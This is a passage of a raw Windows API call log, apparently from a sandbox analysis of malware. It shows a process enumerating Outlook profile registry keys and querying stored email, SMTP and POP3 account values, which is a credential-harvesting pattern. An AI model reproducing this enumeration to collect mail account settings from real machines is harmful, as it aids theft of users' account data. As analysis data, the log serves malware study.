RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0185.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.090] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x871b78 | out: phkResult=0x871b78*=0x220) returned 0x0 [0185.091] GetProcessHeap () returned 0x840000 [0185.091] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.091] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.092] GetProcessHeap () returned 0x840000 [0185.092] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.093] RegCloseKey (hKey=0x220) returned 0x0 [0185.093] GetProcessHeap () returned 0x840000 [0185.093] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0185.093] GetProcessHeap () returned 0x840000 [0185.093] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.094] RegCloseKey (hKey=0x22c) returned 0x0 [0185.094] GetProcessHeap () returned 0x840000 [0185.094] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b98 | out: hHeap=0x840000) returned 1 [0185.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.095] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x5, pszName=0x875288, pcchName=0x19f824 | out: pszName="8503020000000000c000000000000046", pcchName=0x19f824) returned 0x0 [0185.095] GetProcessHeap () returned 0x840000 [0185.095] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c48 [0185.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.096] RegOpenKeyW (in: hKey=0x234, lpSubKey="8503020000000000c000000000000046", phkResult=0x871c48 | out: phkResult=0x871c48*=0x22c) returned 0x0 [0185.096] GetProcessHeap () returned 0x840000 [0185.098] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.098] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.099] GetProcessHeap () returned 0x840000 [0185.099] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.099] GetProcessHeap () returned 0x840000 [0185.099] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.099] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.100] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0185.100] GetProcessHeap () returned 0x840000 [0185.100] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.100] GetProcessHeap () returned 0x840000 [0185.100] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.100] GetProcessHeap () returned 0x840000 [0185.100] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871cb8 [0185.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.102] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x871cb8 | out: phkResult=0x871cb8*=0x220) returned 0x0 [0185.102] GetProcessHeap () returned 0x840000 [0185.102] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.103] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.103] GetProcessHeap () returned 0x840000 [0185.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.105] RegCloseKey (hKey=0x220) returned 0x0 [0185.105] GetProcessHeap () returned 0x840000 [0185.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871cb8 | out: hHeap=0x840000) returned 1 [0185.105] GetProcessHeap () returned 0x840000 [0185.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.106] RegCloseKey (hKey=0x22c) returned 0x0 [0185.106] GetProcessHeap () returned 0x840000 [0185.106] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c48 | out: hHeap=0x840000) returned 1 [0185.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.107] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x6, pszName=0x875288, pcchName=0x19f824 | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0x19f824) returned 0x0 [0185.107] GetProcessHeap () returned 0x840000 [0185.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0185.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.109] RegOpenKeyW (in: hKey=0x234, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x871b48 | out: phkResult=0x871b48*=0x22c) returned 0x0 [0185.109] GetProcessHeap () returned 0x840000 [0185.109] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.110] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.110] GetProcessHeap () returned 0x840000 [0185.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.110] GetProcessHeap () returned 0x840000 [0185.110] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.110] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.114] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0185.114] GetProcessHeap () returned 0x840000 [0185.114] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.114] GetProcessHeap () returned 0x840000 [0185.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.114] GetProcessHeap () returned 0x840000 [0185.114] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0185.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.116] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x871b28 | out: phkResult=0x871b28*=0x220) returned 0x0 [0185.116] GetProcessHeap () returned 0x840000 [0185.116] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.117] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.117] GetProcessHeap () returned 0x840000 [0185.117] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.119] RegCloseKey (hKey=0x220) returned 0x0 [0185.119] GetProcessHeap () returned 0x840000 [0185.119] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0185.119] GetProcessHeap () returned 0x840000 [0185.119] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.120] RegCloseKey (hKey=0x22c) returned 0x0 [0185.120] GetProcessHeap () returned 0x840000 [0185.120] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0185.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.121] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x7, pszName=0x875288, pcchName=0x19f824 | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0x19f824) returned 0x0 [0185.121] GetProcessHeap () returned 0x840000 [0185.121] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0185.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.123] RegOpenKeyW (in: hKey=0x234, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x871c78 | out: phkResult=0x871c78*=0x22c) returned 0x0 [0185.123] GetProcessHeap () returned 0x840000 [0185.123] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.124] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.124] GetProcessHeap () returned 0x840000 [0185.124] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.124] GetProcessHeap () returned 0x840000 [0185.124] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.125] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.126] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0185.126] GetProcessHeap () returned 0x840000 [0185.126] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.126] GetProcessHeap () returned 0x840000 [0185.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.126] GetProcessHeap () returned 0x840000 [0185.126] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0185.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.127] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x871c88 | out: phkResult=0x871c88*=0x220) returned 0x0 [0185.128] GetProcessHeap () returned 0x840000 [0185.128] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.129] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.129] GetProcessHeap () returned 0x840000 [0185.129] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.130] RegCloseKey (hKey=0x220) returned 0x0 [0185.130] GetProcessHeap () returned 0x840000 [0185.130] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0185.130] GetProcessHeap () returned 0x840000 [0185.130] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.132] RegCloseKey (hKey=0x22c) returned 0x0 [0185.132] GetProcessHeap () returned 0x840000 [0185.132] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0185.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.133] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x8, pszName=0x875288, pcchName=0x19f824 | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x19f824) returned 0x0 [0185.133] GetProcessHeap () returned 0x840000 [0185.133] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0185.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.135] RegOpenKeyW (in: hKey=0x234, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x871c68 | out: phkResult=0x871c68*=0x22c) returned 0x0 [0185.135] GetProcessHeap () returned 0x840000 [0185.135] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.136] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.136] GetProcessHeap () returned 0x840000 [0185.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.136] GetProcessHeap () returned 0x840000 [0185.136] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.137] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.138] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0185.138] GetProcessHeap () returned 0x840000 [0185.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.138] GetProcessHeap () returned 0x840000 [0185.138] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.138] GetProcessHeap () returned 0x840000 [0185.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0185.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.139] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x871c58 | out: phkResult=0x871c58*=0x220) returned 0x0 [0185.139] GetProcessHeap () returned 0x840000 [0185.139] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.140] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.140] GetProcessHeap () returned 0x840000 [0185.140] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.142] RegCloseKey (hKey=0x220) returned 0x0 [0185.142] GetProcessHeap () returned 0x840000 [0185.142] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0185.142] GetProcessHeap () returned 0x840000 [0185.142] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.143] RegCloseKey (hKey=0x22c) returned 0x0 [0185.143] GetProcessHeap () returned 0x840000 [0185.143] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0185.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.144] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x9, pszName=0x875288, pcchName=0x19f824 | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x19f824) returned 0x0 [0185.144] GetProcessHeap () returned 0x840000 [0185.144] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0185.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.146] RegOpenKeyW (in: hKey=0x234, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x871b18 | out: phkResult=0x871b18*=0x22c) returned 0x0 [0185.146] GetProcessHeap () returned 0x840000 [0185.146] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.147] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.147] GetProcessHeap () returned 0x840000 [0185.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.147] GetProcessHeap () returned 0x840000 [0185.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.148] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.151] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0185.151] GetProcessHeap () returned 0x840000 [0185.151] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.151] GetProcessHeap () returned 0x840000 [0185.151] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.151] GetProcessHeap () returned 0x840000 [0185.151] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0185.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.153] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x871c88 | out: phkResult=0x871c88*=0x220) returned 0x0 [0185.153] GetProcessHeap () returned 0x840000 [0185.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.155] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="00000001", pcchName=0x19f7f4) returned 0x0 [0185.155] GetProcessHeap () returned 0x840000 [0185.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b98 [0185.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.157] RegOpenKeyW (in: hKey=0x220, lpSubKey="00000001", phkResult=0x871b98 | out: phkResult=0x871b98*=0x238) returned 0x0 [0185.157] GetProcessHeap () returned 0x840000 [0185.157] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ab8 [0185.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.158] SHQueryValueExW (in: hkey=0x238, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x875ab8, pcbData=0x19f368*=0x208 | out: pdwType=0x0, pvData=0x875ab8, pcbData=0x19f368*=0x208) returned 0x2 [0185.158] GetProcessHeap () returned 0x840000 [0185.158] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ab8 | out: hHeap=0x840000) returned 1 [0185.158] GetProcessHeap () returned 0x840000 [0185.158] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.159] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.159] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f7d8 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0185.159] GetProcessHeap () returned 0x840000 [0185.159] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc6) returned 0x868500 [0185.159] GetProcessHeap () returned 0x840000 [0185.159] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.160] GetProcessHeap () returned 0x840000 [0185.160] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0185.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.161] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x871b28 | out: phkResult=0x871b28*=0x23c) returned 0x0 [0185.161] GetProcessHeap () returned 0x840000 [0185.161] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ab8 [0185.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.162] SHEnumKeyExW (in: hkey=0x23c, dwIndex=0x0, pszName=0x875ab8, pcchName=0x19f7c4 | out: pszName="", pcchName=0x19f7c4) returned 0x103 [0185.162] GetProcessHeap () returned 0x840000 [0185.163] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ab8 | out: hHeap=0x840000) returned 1 [0185.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.164] RegCloseKey (hKey=0x23c) returned 0x0 [0185.164] GetProcessHeap () returned 0x840000 [0185.164] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0185.164] GetProcessHeap () returned 0x840000 [0185.164] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x868500 | out: hHeap=0x840000) returned 1 [0185.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.165] RegCloseKey (hKey=0x238) returned 0x0 [0185.166] GetProcessHeap () returned 0x840000 [0185.166] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b98 | out: hHeap=0x840000) returned 1 [0185.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.167] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x1, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="00000002", pcchName=0x19f7f4) returned 0x0 [0185.167] GetProcessHeap () returned 0x840000 [0185.167] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0185.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.168] RegOpenKeyW (in: hKey=0x220, lpSubKey="00000002", phkResult=0x871c38 | out: phkResult=0x871c38*=0x238) returned 0x0 [0185.168] GetProcessHeap () returned 0x840000 [0185.168] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ab8 [0185.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.169] SHQueryValueExW (in: hkey=0x238, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x875ab8, pcbData=0x19f368*=0x208 | out: pdwType=0x0, pvData=0x875ab8, pcbData=0x19f368*=0x1e) returned 0x0 [0185.169] GetProcessHeap () returned 0x840000 [0185.169] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.170] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.170] GetProcessHeap () returned 0x840000 [0185.170] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.170] GetProcessHeap () returned 0x840000 [0185.170] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.171] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x1c) returned 0x0 [0185.171] GetProcessHeap () returned 0x840000 [0185.171] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.171] GetProcessHeap () returned 0x840000 [0185.171] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.172] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.172] GetProcessHeap () returned 0x840000 [0185.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.172] GetProcessHeap () returned 0x840000 [0185.172] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.173] SHQueryValueExW (in: hkey=0x238, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.173] GetProcessHeap () returned 0x840000 [0185.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.173] GetProcessHeap () returned 0x840000 [0185.173] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.174] SHQueryValueExW (in: hkey=0x238, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x1a) returned 0x0 [0185.174] GetProcessHeap () returned 0x840000 [0185.174] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.174] GetProcessHeap () returned 0x840000 [0185.174] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.175] SHQueryValueExW (in: hkey=0x238, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208 | out: pdwType=0x0, pvData=0x875ed0, pcbData=0x19f360*=0x208) returned 0x2 [0185.175] GetProcessHeap () returned 0x840000 [0185.175] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x840000) returned 1 [0185.175] GetProcessHeap () returned 0x840000 [0185.175] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875ed0 [0185.176] 